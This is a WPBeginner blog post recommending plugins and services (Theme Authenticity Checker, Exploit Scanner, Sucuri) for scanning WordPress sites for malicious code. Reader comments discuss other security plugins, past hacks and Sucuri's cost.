Beginner's Guide for WordPress - Start your WordPress Blog in minutes.
Choosing the Best
WordPress Hosting
How to Easily
Install WordPress
Recommended
WordPress Plugins
View all Guides

How to Scan Your WordPress Site for Potentially Malicious Code

Last updated on by
Elegant Themes
How to Scan Your WordPress Site for Potentially Malicious Code

Often we get asked by our users, is there a way to scan your WordPress site for potentially malicious code? The answer to that question is YES, YES, and YES. There are both free and paid tools available to scan your WordPress site for potentially malicious or unwanted code. It is always good to do a regular checkup of your site by scanning it for potentially malicious code. In this article, we will show you a few ways on how to scan your WordPress site for potentially malicious code.

Theme Authenticity Checker (TAC)

Theme Authenticity Checker is a free plugin that scans all of your WordPress theme files for potentially malicious or unwanted code.

Theme Authenticity Checker

Often hackers target themes to inject links, so this plugin is a good way of checking for that.

Exploit Scanner

Exploit Scanner is another free WordPress plugin that is much more robust than the Theme Authenticity Checker because it search all files and database of your WordPress install. It checks for signs that may indicate if your installation has fallen victim to malicious hackers.

Note: this does return a lot of false positives, so you have to know what you are doing to see if the error is really malicious or if it is ok.

Sucuri

Sucuri is by far the BEST WordPress security scanner out there. They have a very basic free site scanner, which checks your site to see if your site is doing ok. But the real value is in their paid version. See our article: 5 reasons why we use Sucuri to improve our WordPress security for detailed overview. In short, once you install Sucuri, it automatically monitors your website 24×7 against all threats. It audits all the activities that happen on your site to keep track of where things went wrong. If something looks fishy, Sucuri blocks the IP. They also send you alerts if they notice something going on with your site. Last but not least, they offer a malware cleanup service which is included in the price of their service (no matter how big or small your site is).

We have their 5 site plan which comes out to be about $3 per site monthly. It makes sense to pay $3 per month to keep our websites safe.

By the way, this service is not just for beginners. Major publications like CNN, USAToday, PC World, TechCrunch, TheNextWeb, and others are recommending these guys. These guys know what they are doing, and we trust them with our website.


Editorial Staff at WPBeginner is a team of WordPress lovers led by Syed Balkhi. Page maintained by Syed Balkhi.

WPBeginner's Video Icon
Our HD-Quality tutorial videos for WordPress Beginners will teach you how to use WordPress to create and manage your own website in about an hour. Get started now »
  • bernard collin

    I had 2 websites compromised with the front page saying hack by mitzy and the other one showing a display of viagra and medic offers.
    I put them both in the sucuri scanner, both came perfectly clear.
    I wrote to sucuri to let them know, they denied the fact, I told them check my websites, they are hacked and since they only are personal wp blogs, I did not care so I suggested to let them hacked until they had found why they could not see them hacked.
    They never replied to me so after 4 days I was asked by my ISP to clean or remove my sites.
    b

  • Marc

    Keith – Wordfence is easy to set up. It won’t prevent attacks but makes it easier to clean them up and it can catch them pretty quick. It is a default plugin for any site I build (which I do on a hobby basis rather than a professional one). I’m now looking at the other plugins Lisa suggested. There are a lot of Wordfence Firewall plugins and the default one isn’t for the current version of WP.

  • Muhammad Khalil Janjua

    Thanks dear you just save my wordpress millions of blessed.

  • Mike Lund

    I WORRY that a plugin that ‘appears to offer protection’ could be a virus.

    How do we know who to trust?

    Some ‘recommended’ plugins have 3 reviews (and one was by a cat)!

    • http://www.wpbeginner.com/ WPBeginner Support

      There are several ways to find out whether a plugin is trustworthy or not. You can do a simple Google search to see what others are saying about a plugin. You can click on the support tab of the plugin page to see what users are saying. Number of downloads are also a good indicator of a plugin’s reliability. If you are still unsure, then your safest web is Sucuri. We use it on all our websites.

  • gmornob

    thanks for share wordpress security tips. I am agree with LISA CASSON =D because who has many WP site that is costly .

  • Wendy Morelli

    Another vote for Wordfence!

  • JaY Srivastava

    First of All Lemme Thank You For This Article it Helped me a Lot as My Site had Some Malicious Code since Long Time And I was Having Trouble with it.

    Secondly thanks to people above for posting some more tools and links.

  • Michael Patrick McCarty

    Thank you so much for this information. I had suspected that I had picked up some malware, and I was beginning to lose some sleep over it. I installed some of your recommended plugins and discovered that I was fine. I don’t know how else I would have found the info I needed. Good to go. Write on!

  • zimbrul

    I was reading few months ago a quite comprehensive article about using FREE WordPress themes and the malicious code they can have within their code.
    TAC is a excellent plugin and I use it every time when I experiment with free themes. Many of them got base64 code and most of the time this will link your site with some no-so-techie type of sites.

  • Lisa Casson

    Scanning your website is a small step in securing WP sites. I’ve learnt that the hard way. It’s more useful if you can stop malicious code getting onto your site in the first place.

    We used to get hacked all the time until I started using these 3 handy plugins:
    Wordfence
    WordPress Firewall
    Block Bad Queries

    Haven’t been hacked since (touch wood). Scanning your current site is important, but it’s just not any good at securing your site long term.

    • http://www.wpbeginner.com Editorial Staff

      We entirely agree with your statement that scanning is a small step. However if you look at the last option we suggested (Sucuri), it is essentially all 3 plugins you suggested (combined into one and then some more).

      • Lisa Casson

        Except it’s not free :) For me who has 50+ WP websites, it’s not even close to affordable. It’s great if you have one website, but I need a ‘bulk’ solution.

        • http://www.wpbeginner.com Editorial Staff

          Yes, you get what you pay for. Not sure what’s your definition of affordable is, but to use Sucuri for 50 websites, it comes down to $1.8 per website monthly. Assuming, you are making a lot more than that from all of your websites, it’s a worthwhile investment. At least that is what we learnt from our experience. An example of this would be: self-insurance vs. going with an insurance company (that will cover everything). Pros and Cons to both.

          You can save the money in your piggy bank and hope that you never get hacked. You take all the precautions necessary that decreases your chances of getting hacked. If you don’t get hacked, then yes you saved a lot of money. Say you do hacked across your 50 websites, you not only have to pay someone to clean it up, but you also lose users and revenue during the time you were hacked. Total bill would be a lot higher vs. if you have Sucuri you know you are in safe hands. Similar argument can be made that what if I use sucuri and never get hacked. I lost all that money. Well Sucuri is actively helping you keep your site safe and if something goes wrong during their watch (they will fix it for no additional costs). We’d rather be safe than sorry.

          We have seen hacks that will not trigger most malware scanners and firewalls. The changes a hacker might make would be hard to detect. Some hacks are very sneaky and not obvious at all. For example, changing canonical URLs of some of your popular articles. Adding links in your older articles. How many folks regularly check all of their older posts? This can happen if you have a plugin that may have a vulnerability. Or another script on the same server that can be infected. Just a few months ago, we found a hack like this spreaded across numerous popular sites, and their webmasters had no clue. Won’t name any of those companies, but they are fairly well-known in the webmaster world. All were losing long-tail search traffic because their articles were suddenly disappearing from search. Instead another site with duplicate content was ranking really high. Everyone was thinking that it was some google penalty. Turned out, the canonical URLs on those pages were changed to this spam site that was ranking high instead.

          Services like Sucuri help monitor that and alert you right away because Sucuri has server-side scanning built-in. More importantly, they will help you fix it along with finding and closing the loop hole that exist.

        • Lisa Casson

          Well firstly, my clients do not pay me to secure their websites – I just add a bit of security because I know the vulnerabilities in WordPress. Also, it’s easy if you look at the monthly cost, but the reality is, I would need to fork out $1450 in one go, to secure 50 websites. I keep regular backups of my websites, and we revert when sites are compromised, and it works well enough for me.

          I can’t comment on the large sites with the problem you mentioned because I have much smaller websites, and often websites without blogs.

          I have nothing against Sucuri, but it’s just not an option for me; that was all I was trying to say.

    • maurizio

      i would add wpscan (http://wpscan.org/) to your list

      IMO security can’t affidate only to plugin.
      thare are some good practice that can apply without plugin: strong password, login pretection, file permission policy…

      Remember that each Plugin can create a overhead…

    • Keith Davis

      Hi Lisa
      Not heard of Wordfence, but it gets a 5 star rating over on WordPress.org.
      Is it difficult to set up?

      This might be a plugin that I’ll add to my security.

      Editorial Staff – what happened to the comments system you were using?
      It’s all changed.

    • bernard collin

      thank Lisa,

      I like the look of what these plugins do, I will install them on my websites and I agree with you, sucuri is too expensive and probably not doing what these ones are doing anyway